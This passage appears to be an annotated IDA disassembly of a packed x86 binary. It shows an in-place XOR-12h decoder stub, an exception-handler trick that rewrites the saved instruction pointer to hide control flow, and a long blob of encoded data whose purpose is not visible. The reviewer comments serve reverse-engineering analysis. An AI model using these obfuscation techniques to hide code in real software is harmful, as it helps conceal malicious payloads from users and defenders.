                push    ebx                     ; keep region start for the final jump

loc_31444263:                           ; CODE XREF: sub_3144421C+57j
                xchg    al, [ebx]               ; al = encoded byte (slot briefly holds old al)
                xor     ax, si                  ; al ^= 12h; ah ^= 0 is a no-op
                mov     [ebx], al               ; store decoded byte back in place
                add     ebx, 1                  ; next byte
                sub     edi, 1
                cmp     edi, 0
                jnz     short loc_31444263      ; loop until all 243Ch bytes are done
                pop     ebx                     ; ebx = start of the now-decoded region
                mov     esp, fs:0               ; esp = our SEH record; drops the eleven pushed dwords
                pop     dword ptr fs:0          ; unlink the record, restoring the previous chain head
                leave                           ; tear down start's frame (also drops the return address)
                jmp     ebx                     ; transfer to decoded bytes; never returns to start
sub_3144421C    endp

; ---------------------------------------------------------------------------
                align 4

; =============== S U B R O U T I N E =======================================
;
; sub_31444288 -- rewrites one dword at offset 0B8h of a caller-supplied
; structure with its own return address, then returns with eax = 0.
;
; NOTE(review): read as the body of the SEH handler described at start:
;   [esp]      return address of `call sub_31444288` (= start+0Dh)
;   [esp+4]    return address into the exception dispatcher
;   [esp+8..]  the four handler arguments; arg_C (esp+10h here) would be the
;              third one, the CONTEXT pointer
; 0B8h is the offset of Eip in the 32-bit x86 CONTEXT, so the pop sets the
; resume address to start+0Dh, and eax = 0 matches ExceptionContinueExecution.
; The pop also removes this routine's own return address, which is why `retn`
; goes back to the dispatcher and why IDA reports "sp-analysis failed".
; Confirm this reading in a debugger before relying on it.

sub_31444288    proc near               ; CODE XREF: start+8p

arg_C           = dword ptr  10h

                mov     edx, [esp+arg_C]        ; edx = structure pointer (presumably CONTEXT*)
                xor     eax, eax                ; return value 0
                pop     dword ptr [edx+0B8h]    ; [edx+0B8h] = our return address; esp now at caller's return
                retn                            ; returns one level further up than a normal call would
sub_31444288    endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; NOTE(review): the bytes from here on look like the region sub_3144421C
; decodes (XOR 12h over 243Ch bytes) -- they are not meaningful as listed.
; Supporting evidence in the data itself: 12h is by far the most common byte
; (00h ^ 12h), and XORing each byte of 617D7E51h, 7C735A77h, 12777E76h with
; 12h gives the ASCII bytes "CloseHandle",0. For static analysis, apply the
; XOR to a copy of the section first and disassemble the result; the blob
; continues well past the 243Ch bytes, so the tail may use a further layer.
                db 82h, 0FAh, 12h
                dd 99121212h, 92E53616h, 12123639h, 92121212h, 3BBE8A9Bh
                dd 4E991212h, 3F661636h, 0A29B4BEEh, 12123BA2h, 3BA6AA9Bh
                dd 0AA921212h, 1212363Dh, 111F67FAh, 1236228Ah, 10499912h
                dd 1AF921EDh, 36238A99h, 21ED1212h, 93874749h, 8916367Eh
                dd 93121270h, 0EDE212F1h, 14FF93EDh, 99125202h, 9F16366Eh
                dd 52262EA7h, 1212AB12h, 0B6E11212h, 465C6993h, 67617B7Ah
                dd 2E51991Fh, 740A169Fh, 57422A93h, 0F9931A66h, 12121312h
                dd 4299F067h, 99C1116Ah, 58993260h, 43E1110Ah, 93D111BFh
                dd 5512ED6Ah, 9676677h, 42116A93h, 67717D60h, 156A9300h
                dd 60767653h, 6A931B67h, 61617719h, 0F0176612h, 0D14F4BC5h
                dd 99361E3Bh, 114B3660h, 16A51DE1h, 0E68995Ch, 2699E911h
                dd 0FAE11195h, 1212121Eh, 617D7E51h, 7C735A77h, 12777E76h
                dd 9BC4ED41h, 52272E97h, 121FFA12h, 60511212h, 77667377h
                dd 7C776457h, 41125366h, 979BC4EDh, 12522752h, 12121FFAh
                dd 66775512h, 6661735Eh, 7D606057h, 0ED411260h, 56979BC4h
                dd 0FA125227h, 12121262h, 3366D297h, 5687ED42h, 97125227h
                dd 9F0267D2h, 5203C097h, 0ED429812h, 12127CFAh, 0ED6EF912h
                dd 52272E87h, 2397E512h, 12125226h, 66921212h, 27A79F0Ch
                dd 99125226h, 0B616366Eh, 0A08F99B7h, 9912522Bh, 522BA4A7h
                dd 0A8AF9912h, 4F12522Bh, 127848D1h, 12781278h, 137A1278h
                dd 99121612h, 421278D6h, 0D6991E78h, 4644F0EDh, 1212214Dh
                dd 0C8FADB21h, 9FEDEDEDh, 5203B387h, 43434012h, 5287ED42h
                dd 91125227h, 98D132D6h, 304DABE0h, 2221212h, 0F0C41052h
                dd 0DA59D1EBh, 252B7321h, 14C91FD0h, 0DDD63E78h, 6107F408h
                dd 35CEC341h, 752B2AEBh, 0A415FBCCh, 99C306B2h, 0FCE0D66Bh
                dd 0C3997F70h, 0AFF9638Dh, 4AE017AAh, 0AC5076B5h, 4F980F80h
                dd 0CE039DBBh, 18D2272Bh, 10B606CDh, 0C487DFD0h, 9D16FE07h
                dd 14EFFEFBh, 0F5CE764Ch, 5F327191h, 72E6BB4Fh, 4CA65267h
                dd 6D9F13E4h, 5EE30EFh, 76B64B1Ch, 49A8836Fh, 55866077h
                dd 0E832CF90h, 0CD734B29h, 0B05C4FF8h, 0E5D47304h, 4020AAFh
                dd 9D93AB3Ch, 97D37387h,
38D9FC2Bh, 818A2F55h, 5449F00Ch dd 39F28D2Ch, 551E3EE5h, 4A7FFF0h, 0BD36195Fh, 2B7DF21Bh dd 9E8E8FB7h, 12F2E5BCh, 0D88B82ACh, 9912FD85h, 59F59837h dd 0F9A0899h, 7581777Bh, 29E3B74Bh, 405E566Bh, 45D9EFE0h dd 0A2A6BEECh, 64CE59Ch, 5B404DBh, 5182BE1Ah, 15B6CB98h dd 894317A8h, 0E03EB60Bh, 213F4F40h, 0F3431F23h, 59785887h dd 653E9BD4h, 0B1201FD4h, 8A9AC33Dh, 81F27662h, 35CF8355h dd 744A3A9Fh, 674EFBCCh, 467206D8h, 85AB0371h, 11AF9730h dd 691F8B5Ch, 23FD2896h, 9FCDBAB4h, 348505AAh, 0CDC66E50h dd 9A1196D3h, 65CBC3F9h, 0F505DF90h, 62A9158Bh, 0A9623120h dd 0B1DA0D14h, 0FEDA236Ch, 6DD333D9h, 0A874A98h, 0B65E53B3h dd 1D7B239h, 4CB60B29h, 4F2A0423h, 0D6EEA376h, 210F373Dh dd 9491BACh, 266DD9FBh, 0D06AF68Fh, 41359F10h, 0C893247Dh dd 0E222B7BBh, 0F57BEB51h, 0C0EAD0E0h, 0DE44FE83h, 0BC798718h dd 455EE6BCh, 1E2B8F4Fh, 0FD45E259h, 150FDCE8h, 0F6AE2301h dd 208B7049h, 7EF05EE3h, 6BBAE7F8h, 2881CC39h, 0B1BC11ADh dd 7719E03Ch, 0D63B4148h, 948DC7E4h, 821A85A3h, 0AD0C6C35h dd 4C3F5F72h, 59E86BBh, 51EAA3C9h, 0F0E2409Ch, 76BC5AACh dd 7E08DC0Bh, 0E1F74B8Dh, 6BC69B2Ch, 5D552AD3h, 0C9DAC12Fh dd 4AA8B4B6h, 13FE2B96h, 62A27761h, 0BECEE998h, 291AC5A4h dd 6526FB8Ch, 0EB2347B2h, 3ACE5D8Eh, 519F9FA5h, 0F975D35Ch dd 20CCBF28h, 41A5E3B4h, 6DF10FAAh, 0CDEC1B86h, 73806552h dd 4C30DB44h, 7160DF90h, 0CDA981EDh, 9C86A237h, 0ACD14354h dd 85D590A5h, 0D219466Bh, 69327215h, 0F1E713E4h, 5A6A3FFAh dd 7C13B8F3h, 49D297C5h, 196B2E74h, 9E3A8F94h, 6DD3964Ch dd 8B9267E0h, 0D022E6FBh, 27229F10h, 1116AB7Ch, 1C4998E7h dd 0DC3C53A4h, 0A4F64696h, 8CF01E6Bh, 7897F234h, 0D0E18364h dd 916ACAF8h, 883A8E55h, 9DD257A8h, 0EAC4435Eh, 14161ABFh dd 8D83DB2Ch, 0F6D92E7h, 0F32831AEh, 0F0E08B9Bh, 1DC7836Eh dd 4CB1B748h, 6CA6D0h, 0E828BFC7h, 0C80A52BAh, 0AFB2227Fh dd 309206DBh, 9561BF30h, 2D609DCAh, 1CBD40FEh, 0D52E1624h dd 0B6AA8B83h, 38FA0ED3h, 5978A738h, 0F0C1F1EEh, 0B10A2AA0h dd 0DD970345h, 889E008h, 61EA8FDDh, 0ED8F5037h, 5E26BBB9h dd 85D7842Eh, 0C59E13D2h, 84552864h, 3DB6BEECh, 157617EDh dd 91D060F2h, 0D585E1B2h, 0CDEC53C8h, 
8C2D4D52h, 25BE86ECh dd 0AD7E1F15h, 996B032Fh, 605137C8h, 0CCBEA085h, 41EC53A5h dd 0ACCECE4Ch, 793F6959h, 0D50A43A4h, 813A6EA6h, 9523B44Fh dd 8CC2D71Dh, 5A9AFAB4h, 691EBB7Fh, 0BB7A9E23h, 757A27B8h dd 0B6418CF9h, 4F60AAFh, 0C5FDAB3Ch, 680A3309h, 4A1903D4h dd 81AF1375h, 1643920Ch, 707F78A7h, 1D468B64h, 910331B0h dd 0BD7B6EDCh, 0C98256E8h, 15AE6334h, 21FA8F40h, 1E508A6Ch dd 0AC1A7247h, 0FCD53384h, 844ADBBCh, 0DE3889C7h, 5A83F514h dd 186F8DF1h, 0E3158BC5h, 0D9055EA6h, 0CAE51B6Bh, 6C88CC16h dd 519FCB02h, 0F42B8F0h, 892C72C4h, 0B40B51B7h, 88FC2A74h dd 0D87FE40h, 3877D53Bh, 0C7896F0h, 0D0077ABCh, 0B3FF5B8Ch dd 0AAA2366Fh, 41AFE626h, 2E68FF05h, 1E559EEFh, 0CB310799h dd 0A0EA3281h, 7EC71A62h, 55A2EE28h, 2D63B21Ah, 0F05CA0B4h dd 0F51F7BA1h, 0ACE32984h, 6B91675Ch, 408AD221h, 1D65B0C4h dd 0ED3A8ED4h, 0C73105FBh, 9DFD3375h, 44DA1B4Fh, 7992D234h dd 1857B5F0h, 0EC1813C0h, 0B83E5A9Ch, 92E22E71h, 7DB1EE7Bh dd 3CBACE11h, 263AAAEDh, 0E4006FC9h, 0ADD34294h, 87D70170h dd 42AFEB25h, 3851AB3Dh, 54BB1FCh, 0CF2750B1h, 0A4DD2F85h dd 81CF3D78h, 549BD33Dh, 2059D301h, 0F545B2C4h, 0F51367A9h dd 0A5E63989h, 52AE2251h, 44AEFB25h, 2440AB01h, 0F81C82D4h dd 0A53F56A9h, 0A5FE3A57h, 4DA60659h, 688AC329h, 16B8494h dd 0F2288AF6h, 0AD0854A5h, 0AFC6225Fh, 6CADE141h, 29AFD11Fh dd 127ACBDDh, 0E00E73C9h, 0A70F5196h, 0ACBA0E79h, 6490EB4Dh dd 3F5DD01Dh, 529AC2h, 0D43A50D0h, 0B1FF6D92h, 99C33A6Dh dd 52A0EA24h, 3155AF21h, 1F7695E9h, 0CA1764B7h, 0B7CE5397h dd 62CF1C5Fh, 7BC4B82Fh, 3D71A501h, 0FA5CB3B4h, 0D2096AA3h dd 0A8C869DFh, 4AD21340h, 4CB8C721h, 54BBAFCh, 0FF3F99C8h dd 0DA0743BDh, 90DD4355h, 6DB32954h, 408FEF29h, 1561C7FDh dd 852E76C1h, 0A51946A3h, 94E22679h, 6696F245h, 3082CA32h dd 457A6D4h, 0E0284EACh, 0B0C45799h, 83F10461h, 54A6F616h dd 2F7FFD7Ch, 54382FCh, 0DA226F95h, 0B3CD2F83h, 0ABC30F65h dd 3997EB31h, 215FA72Ah, 0E5598ADAh, 0CB1F798Ch, 0AEE73B81h dd 7AFA1051h, 2194EA2Bh, 3F45AF22h, 0FC2686DDh, 0C0125A82h dd 0B2FE1110h, 69B70E4Eh, 4690E72Dh, 67DA6F7h, 0C22EA1A0h dd 0D9075EBEh, 96C0177Dh, 76ADF647h, 
1FEAC735h, 184488E8h dd 0DA2763C9h, 0BC1A4091h, 0AFBA216Fh, 7DA7D658h, 2E77CE2Eh dd 6D95CBh, 0DE236BB3h, 0A9D82B92h, 87C70747h, 50A2EA12h dd 0E6EE160h, 3D489EFCh, 0DC1168AAh, 0AACA2097h, 11C41A5Bh dd 4FA6FF12h, 2A67A307h dd 0E747B5C0h, 0CD1B7AB4h, 0A2EB3EA1h, 57D21E4Ah, 4C8CE430h dd 185CBAE4h, 0FC239FCEh, 0C4077AA4h, 0F5F7317Bh, 54B61B72h dd 4285D222h, 0D61A2FCh, 0E2307AD6h, 0BF2B50A4h, 89E5226Fh dd 6EACFE5Ah, 14BDF474h, 135BBBD3h, 8D366ED8h, 0AAFD4B9Bh dd 86D10061h, 31BEFA3Bh, 3378C41Fh, 695694EDh, 0DD3A66B3h dd 0A3EE5C8Fh, 80C71575h, 5C80873Dh, 361EA507h, 914E91D5h dd 0D61564AFh, 8082238Dh, 67CB175Ah, 628EEA2Eh, 2875B400h dd 0FD3C86F0h, 0EC7E56A8h, 83EF2B7Eh, 5AA20E52h, 46A1C32Dh dd 166BADFAh, 0D23E8AD4h, 0C8125AB8h, 8DDC0E18h, 60B0E141h dd 349AF004h, 34368AF2h, 0FB2763C6h, 9A1A469Ah, 0B4D42A70h dd 0D87F75Eh, 3C66C931h, 115B9DF6h, 0D52B7A82h, 0B8FA42BAh dd 0BFE63608h, 687D315h, 0D5E8152h, 874FBC0h, 0D61E44BFh dd 0A0D53697h, 74F87F49h, 5886C43Bh, 30679C06h, 956F9BF1h dd 0F01D6A92h, 0B4F43E99h, 6CBE066Eh, 6486F621h, 166F8D90h dd 0CB228EEFh, 0CC175BA9h, 0F5CF3B51h, 2ADF86A3h, 2D8EEA84h dd 0F4DAC798h, 0EF5D37E8h, 806F55F0h, 0F8DC184Ch, 82925BA3h dd 3FBAF3A0h, 32689EC0h, 0B8B68E53h, 1D1127B8h, 112B8C08h dd 0B2CADF65h, 0AD5A3B8h, 7C937205h, 4A7D0394h, 0AB9A45B0h dd 49338402h, 0BCF2C76Dh, 0D59ADCA4h, 0C12AFFB0h, 0BD1FC5B4h dd 0A356DCE8h, 7F62E834h, 21FAE700h, 4F6CDB7Ch, 0F1528DEAh dd 0A57E5A0Ah, 0A2DB5F7Ah, 0F943946Ch, 76E2F77Dh, 499B3CCDh dd 45AAF95h, 263A4F33h, 0B9A7CF95h, 88D27024h, 11FABFE5h dd 2AE7C89Ch, 290E8FBh, 955BF771h, 7535C200h, 0E5C69B0Fh dd 0A6ED582Ch, 50D6760Fh, 3EC71F90h, 0DD96081Dh, 165D34E0h dd 0ED4B08ABh, 0CC1AEF55h, 6D051303h, 4640EFD8h, 4015AC1Bh dd 11EA4AECh, 36824BD9h, 6AF758E5h, 88C6E3B4h, 2A85F03Fh dd 9845042Bh, 19D267D0h, 0C87FEE44h, 714AC584h, 18DB228Fh dd 0A9222A66h, 0A4DF1745h, 0FE8B3E70h, 6DD3D7D9h, 5D364098h dd 0B062865Bh, 13373FB0h, 15E34B18h, 9C29728h, 16032229h dd 0B3A8F9Ah, 83D39653h, 899267E2h, 0C19EBE56h, 0B2CAB550h dd 9A70A7B8h, 
2938A30Dh, 726ECED4h, 81807965h, 0C7A65F0Ch dd 5331DA58h, 0BA1FB965h, 95590083h, 7DF31E23h, 0C2EAA79Ch dd 9EAE6334h, 71F9D490h, 3FB35650h, 1252A7A2h, 0A57F3F7Eh dd 0F900D410h, 1ED66B3Dh, 49299CB0h, 0D3FD081Fh, 0C65F9BC1h dd 6F8DCE2Eh, 0AEBD809Bh, 8E8D47AFh, 3BBEEFBCh, 17649ADCh dd 79D7E857h, 566E63C1h, 743143C4h, 0D86AE58h, 0B3917053h dd 0F393483h, 384AF7D0h, 0B75528ABh, 0E04A2F12h, 0B8CE8354h dd 0BFB0CE22h, 0AED68E45h, 8F3492B1h, 419B53A4h, 98E87738h dd 7DC0CDC9h, 8AE02068h, 952E0BE1h, 20270FC0h, 8D9D5201h dd 534FEC38h, 0A6FEF372h, 7102FBECh, 9DEF6FB3h, 45E337C8h dd 0F58E411Ch, 0DE0774h, 0B819BB4Ch, 7972F208h, 1D3EF2Fh dd 0D16B3BD4h, 0FDDC1B1Ch, 9C293C0h, 1BCF574h, 0F4C59880h dd 8D062E20h, 4E1FEECBh, 0E5BE7200h, 33A0CE01h, 3517C12Dh dd 2922F788h, 0E9DBFC86h, 579A6FD5h, 0B6D28D89h, 3D9AD308h dd 121ED365h, 0B10E4B4Fh, 42760BDEh, 89B47F7Dh, 0D52B3A34h dd 35199934h, 27D2503Ch, 0CE03B5B8h, 69EBCC92h, 0A88A1F25h dd 0CDA3ABB9h, 1577481Eh, 0F80E83A1h, 0D608ABF7h, 203E7FA6h dd 0F9B3438Fh, 0C5ED3824h, 0A2B3AF1Ah, 2D669B37h, 0D91247F8h dd 0B1FBDCA6h, 60BA0F35h, 0DC493E8h, 7D665878h, 7DAB0C8Ch dd 0E24A5FE6h, 0EB8EBE03h, 2BFF7748h, 0B4E8350h, 71BDA6Ah dd 78A27607h, 0A0910798h, 0D59EC669h, 0C0A97F70h, 0B924740Ah dd 568AD8A8h, 9A2EE3B5h, 0A17B1F44h, 0F7B8DBECh, 9994774Dh dd 0A1F1B37Ah, 710ADE91h, 0E876D53Ch, 97E37139h, 0B2C00A44h dd 0CE512D55h, 62E7FD8Ah, 136309B3h, 0D60842A4h, 0E77AAA0Fh dd 0C6EF4B5Ch, 0D64798E9h, 0D8EEA374h, 21276D05h, 0E54671ACh dd 0D99227F4h, 70412054h, 318AA940h, 5D16A741h, 0D6A7F888h dd 5C4E03D4h, 0C19A2F51h, 0BFF6458Dh, 0BCFDD111h, 451ED3C1h dd 3D223933h, 397906E0h, 0C9825771h, 0E6DB4308h, 2EC0B3ECh dd 4D0657E9h, 0B95F4AB8h, 985E13E4h, 85EF3831h, 217A1449h dd 0A89EC268h, 1D2E3CEAh, 0F02F9BD4h, 0DD65454Dh, 8C9D6822h dd 0FA99554Ch, 0EBDBB070h, 7D36EC8Ch, 7610F55Fh, 955B9F61h dd 0B17A7C00h, 0E596CB7Ch, 5912A771h, 0B499CC0h, 0D52B70BCh dd 0FD03D4FCh, 6CA2373Eh, 6F8F794h, 0B9F26A9h, 3C26BBBAh dd 0B97007B0h, 93CF0264h, 353F8060h, 0B0F6CB6Ah, 919D4FDh dd 
5C1DB3B4h, 0F32A5E94h, 58790ABDh, 19925254h, 0DADAB7C3h dd 313FE305h, 1D9513BCh, 0E9774045h, 36774214h, 559C2073h dd 68B4FA1Bh, 1A5B8AC4h, 0EA2D7CD6h, 86364B96h, 92D22575h dd 4A9EE45Fh, 309CD101h, 46CBBEEh, 0E22F68DEh, 0A1D77B96h dd 97D11F74h, 65CAED35h, 3871D91Dh, 1A4DBFFCh, 0B54C03A0h dd 0C19ADF1Fh, 9FD67B0Ch, 549BFF37h, 266CBA4Ah, 0F0469ED7h dd 0CD5872A4h, 80CC5784h, 788E2877h, 4E96E729h, 476EB005h dd 0CB17B4EDh, 974E4AE4h, 0C0BA6A20h, 33F6451Ch, 63CF8D68h dd 55408ADBh, 0F3339986h, 0F86C4EB8h, 0F9B247F0h, 0E85FCE24h dd 51AAA2C4h, 68414E5Ah, 764217E8h, 955BB761h, 0FE528E00h dd 13ACA758h, 6C4212F3h, 0C967F3C4h, 9B3F31ECh, 22A8AA9Ah dd 64810215h, 75F8C3E9h, 436C2460h, 0C8405EDBh, 8A188255h dd 401153A4h, 11EA4CA0h, 0C7B002A6h, 0B2FC99E4h, 5ACCE205h dd 24F74C2Bh, 0CDC64E5Dh, 73D20D68h, 816B4C4Ah, 0F20A9FA5h dd 995ECFC0h, 0AD8A1CBDh, 0A68E4314h, 0FEDA2C66h, 6DD333D9h dd 857A2F98h, 82B6EC5Bh, 826A3FF0h, 0B2E9085Ah, 9C3D977Bh dd 55AE96FCh, 9EC6FE68h, 7E10F353h, 546DD807h, 0E5FE6007h dd 31CA94B8h, 1845FE7Ch, 4710C4DAh, 0B5024F90h, 0F406BA1Fh dd 0E74E7B4Ch, 4EF28758h, 2C6CA317h, 0D04C8BDEh, 28895BDCh dd 0C9C262A0h, 20FAE6BDh, 10F58F00h, 55E656E1h, 1CDBE7F8h dd 0A53E0582h, 6D1FA041h, 8ED62B09h, 29E2B320h, 98BB4E94h dd 0D85AAFB8h, 9B4A8641h, 2F5A4758h, 63216CD2h, 4C8D3AB7h dd 8DC9CBDCh, 942BB22Bh, 586E23B4h, 0A1A76895h, 6792CB2Ch dd 0B12CD79h, 653EF1ECh, 81DFE050h, 58966BCAh, 0CBD72DC8h dd 28940ED9h, 2B48AF20h, 0A93768Ah, 0ED7247C5h, 94CE03B2h dd 253F8062h, 65F6CB6Ah, 7F2E4297h, 10E8E3F4h, 0A13A378Dh dd 0CD8AB3ECh, 4A856738h, 16B5F00Bh, 3D4EF1A2h, 8A9EBF0h dd 0A9220254h, 0F5892B87h, 0B4576F20h, 2DA6A308h, 858F4AC1h dd 6D5E5391h, 2E95C9A1h, 0FDB647F4h, 478BC028h, 1ABED3Dh dd 2D768BAEh, 11D3E4ACh, 5C9267CDh, 23A7CC4h, 0A2CA9F51h dd 5D16AE14h, 0EB977A88h, 0EC4E43CCh, 0F782926Dh, 0F74E7B4Ch dd 0BA0D78AEh, 528CFD9h, 1525FFB0h, 0BD760A1Eh, 0C812BB69h dd 7DFA6334h, 21FA8E41h, 78FA4E93h, 5DD3E7F8h, 0A57E3254h dd 9B5ED440h, 8829393Ch, 29A28154h, 570311h, 92D287ADh dd 38993BCCh, 
0F9F272A4h, 0B85D71CFh, 51AAA219h, 0F01FBE9Ch dd 0C95F7A2Dh, 409173F4h, 0E1FA7908h, 89C95BA9h, 5912A643h dd 0EE32B30Fh, 3E7AE0D0h, 9D8B4279h, 0A427B108h, 34CEC36Ch dd 4070AF0Ah, 0F8D9F9E6h, 0B93231CCh, 0CA61AB67h, 11AB6DB4h dd 0A87B185Ch, 4942CA0Dh dd 0C67CF3DEh, 977E9A3Fh, 0D035BACh, 1920E237h, 9873B344h dd 714AC216h, 21BEE30Dh, 0C19DC832h, 0F58E4380h, 883C447Eh dd 0D2B29F78h, 39075F0Dh, 11E39EA4h, 606A7FEDh, 72BA31Dh dd 4D4968D7h, 0B52FB350h, 457EC488h, 85A6DAA8h, 0D1B663F3h dd 0E5BB9B54h, 1FEF9F50h, 0A16D34Ah, 5C766277h, 71CD0394h dd 0C7DDE9ECh, 6C33F62Ch, 53F2C745h, 453FBB64h, 0C278FFB0h dd 8B669E23h, 0B50F57A8h, 0EAF97710h, 61CFD7D5h, 75021D6Ch dd 9938A7B2h, 5A2D6494h, 0B1BC4F85h, 9030683Ch, 69FF15F5h dd 1D0EA994h, 815AEFACh, 3899689Bh, 0F9F27108h, 5DE9F19h dd 0DCA7CA70h, 3D008529h, 0C4CF9AA8h, 0FE6E63CCh, 0B0BA25CEh dd 9839C87Ah, 59529174h, 1B3E0B07h, 4FC18EFFh, 0EBD89E71h dd 0E4127748h, 25BB2DA6h, 0BBE24700h, 1F470473h, 347BE4CFh dd 2F755293h, 0DF81B0BBh, 0BB836D1h, 0EDF1D728h, 2CC51433h dd 0A1EFF093h, 4D861BDAh, 59C71085h, 0F8AB244h, 717FEFF8h dd 21C314BCh, 296277FDh, 0B5B60EA9h, 10AE6F20h, 308F3E8Bh dd 7932C7D8h, 9813A4h, 0D12A07BDh, 3E0A21Ch, 8C0568D7h dd 55AEB6F4h, 0E13ACF80h, 8D42D9F1h, 0F9DD2DF5h, 8BD11C6Ah dd 11ACF070h, 3870C210h, 496DD7A9h, 0D0236AA0h, 0E1F55BC0h dd 88CA1E6Fh, 4D93F53Ah, 4F13F201h, 0B10ADF90h, 0CE5644FCh dd 0ACEF3A9Dh, 74C94346h, 4F9FEB32h, 1F0CD64Dh, 0F7378BDDh dd 0D61B5FB0h, 0D1F33363h, 6DA60A54h, 47839731h, 0D6BE3F0h dd 0F5398AD0h, 811255ADh, 98C63438h, 6BB7F74Ah, 7CCA8517h dd 1C61C191h, 0E02A74DCh, 0B44E449Ah, 859A236Ch, 6CE6E24Dh dd 3732C316h, 115694EDh, 0DE2C3FFCh, 0AFF00B8Eh, 8DCC1261h dd 1587A327h, 3573CE17h, 3A2CF6B6h, 0DC0062B0h, 0A0EC32C4h dd 64C50610h, 4F90AB70h, 2D6CB201h, 0D60EDCC7h, 801F62AFh dd 0EDF212CCh, 6DF21451h, 49BDE2Dh, 567E96B0h, 0FC3ACBCFh dd 0A44352BCh, 320A471Eh, 0A7CE7C10h, 0F99F565Ch, 724873D7h dd 234A3AA1h, 6090DAE0h, 0BDAAA13Bh, 8C490E7Fh, 0CF35CDAFh dd 12FBB19Ch, 14EB5CB6h, 0EEC06F9Ah, 4EE72444h, 
74E8406Ah dd 0AB09DE49h, 7DB9DA7h, 1A27DCB4h, 0AD5673B3h, 551529CEh dd 39F28780h, 451ED364h, 912AFFB0h, 0BD760BDCh, 0C98257E8h dd 15AE6334h, 21FA8F40h, 4D06DB6Ch, 9952E7B8h, 0A57E33C4h dd 0F18A5F10h, 1DD66B3Ch, 29E2B748h, 0D08DA394h, 811AD606h dd 7C3B8CCh, 0F9B20721h, 119D242Bh, 5EF2ECFDh, 7E30802Bh dd 0AD069C78h, 0D92C08D0h, 0A3815672h, 86D2E824h, 1B39B33Ah dd 0C3AB7A88h, 384A5FE9h, 9DAF8179h, 6AA79C08h, 0EC2CAB96h dd 411E6D01h, 4FD17E04h, 0DD9A0798h, 0AD9E53E4h, 11AA7F10h dd 1FD20ED1h, 705BD728h, 162297ACh, 56980B00h, 0F408DE13h dd 0EE116778h, 0D273B09Dh, 920A9FB2h, 612614ACh, 41E13747h dd 7C78A110h, 41F84BBDh, 2DDC384Ch, 4B19C2ECh, 84E61A7h dd 8A32C3BEh, 0FD8CC842h, 3B3D935Ch, 2711A09Fh, 9E6D2790h dd 436DE453h, 0E038AAD3h, 0E6E67344h, 0BE09AB1Bh, 1D2F39F9h dd 0E7A73088h, 0B54E43EDh, 299A2FE0h, 0EDA67B30h, 7C02D3h dd 30F6D324h, 79D50047h, 0BD760BC4h, 0F00CEA6Bh, 60AE6374h dd 81670648h, 0A6069B4Eh, 17DF1824h, 667E73FDh, 0C818DA9Fh dd 885F6B7Ch, 29A28EC6h, 750EC07Ch, 4293DCA0h, 0ADE6A847h dd 11E04718h, 0FA216DC9h, 68402A73h, 0AB35CBDCh, 894E6D2Bh dd 0D469A7FBh, 9B394F00h, 89C99B3Ch, 5912A785h, 3532B10Fh dd 4EB4D738h, 77132803h, 0EAA23731h, 3D44D392h, 351A56E0h dd 43DF7B95h, 523204ACh, 0C4D6D815h, 0CE759EB1h, 0C4775483h dd 494E9B2Ch, 0BE770FC1h, 5B838C08h, 0CD31D4E3h, 98B46738h dd 17CD4D3Ch, 71A15A9Fh, 1E00EBBCh, 0AC1737F2h, 1E9E099Fh dd 2D0E422h, 5F0EEABDh, 7ACD3866h, 0C567B911h, 11EF92F0h dd 79B9B064h, 9C297ACh, 6C44168Bh, 896ACFC0h, 72B9E5F9h dd 0E038A2FBh, 60317344h, 318AA6FAh, 0E32AF7Fh, 5A20370Bh dd 0BDF80C0Fh, 81A3D03h, 0C967282Ch, 25DB837Ch, 6112FA40h dd 78C1BFEBh, 6A79F05Dh, 0F7F68A53h, 500698B5h, 178E542Eh dd 765F20EDh, 0B7261819h, 87A8C845h, 0D7FEF3A5h, 0F44590BDh dd 37964410h, 9C733815h, 972E1CF8h, 9220C04Dh, 0F7C6A63Dh dd 3AEE68A5h, 579E5E55h, 44A45E63h, 601917E8h, 2A91DC85h dd 0F578CC5Eh, 0F23874C5h, 33126487h, 70D6AB80h, 39B5E026h dd 9DB2FA69h, 0D81A1108h, 0F52C814Ch, 0A318AC84h, 6B4C50EAh dd 4C88EF80h, 71DAC1Bh, 7B7BF838h, 0D01ED359h, 0C9FD289Dh dd 
9E5DE04Eh, 24785F70h, 0CDC67F3Dh, 73F58C92h, 0A554EB2Ch dd 697FDC6Ah, 50BEFA0Ch, 119DC83Dh, 0F58E4315h, 0CAEBDA4h dd 0E7185B9Dh, 7CD93173h, 855E131Ch, 6E889470h, 0C10BC6DFh dd 0FEC2D71Ch, 15DA92F1h, 613ACF80h, 3D456F2Ch, 5C658D98h dd 0E5FE4735h, 30CA9F53h, 5DE02F73h, 3C9AF788h, 1EA6EF5Fh dd 5727A64Bh, 5DA63B35h, 0CE592DB0h, 52AE2E1h, 912AFFB0h dd 27CB82DDh, 0BD8217D1h, 242B947Fh, 21FACF74h, 0F504DB6Ch dd 0AFAD83DFh, 0C2C636B1h, 5AA4D474h, 1DD6D35Ah, 2A961C2Eh dd 82A49E24h, 0C16EDE25h, 0AD663BCCh, 943FFF10h, 13AB932Ch dd 65DB3A87h, 7D36CBDCh, 0AFA13A8h, 0A16E2B31h, 0C39F705h dd 426D9BD4h, 6D23228Fh, 653DF3C4h, 0B53E1FD0h, 763CC24Ch dd 0D034F283h, 0FA458314h, 993674Bh, 5CA30C70h, 0BA7247ECh dd 0B19E53E4h, 75CDC76Fh, 807FBDA3h, 4942EEF6h, 952E5B1Fh dd 19D16BA7h, 0CD867D65h, 0E76F8F93h, 54E4CBBh, 8EF61078h dd 0FB6F0843h, 0CF77C870h, 7E25D2BFh, 41EE5EB5h, 0DA344C4Ch dd 7932C45Ah, 6D4A66A4h, 2E95C167h, 545E54ACh, 6F3D68D4h dd 33FB5CCCh, 0EA915E2Bh, 13C39063h, 0F29267C1h, 19F6FACCh dd 5FB1AA7h, 5D12AB3Ch, 7B56F788h, 4B8E2A6Ch, 0C9228428h dd 46A20FCCh, 0D20AF2E0h, 0C0E97803h, 916ACB81h, 0BD760BD4h dd 74021D9Dh, 15EE571Bh, 99BBFB40h, 842FC345h, 0AD7942B2h dd 41BE3384h, 0DA2F5513h, 0B6D62B08h, 0A34806F8h, 353AEC11h dd 0C1EA45A0h, 994DBEC6h, 9F184758h, 0F223719Ch, 11DE8EF5h dd 7D36DB9Ch, 394563A8h, 6D0889BDh, 4ADCB375h, 3E6C739Ch dd 0E49B0CB8h, 657ECA06h, 857B9A27h, 0DDB62BBCh, 0E0D77708h dd 0B0C4DBE4h, 415A9B49h, 0EC9E9D26h, 88F7F018h, 859E13D0h dd 65AA7F30h, 15320B5Fh, 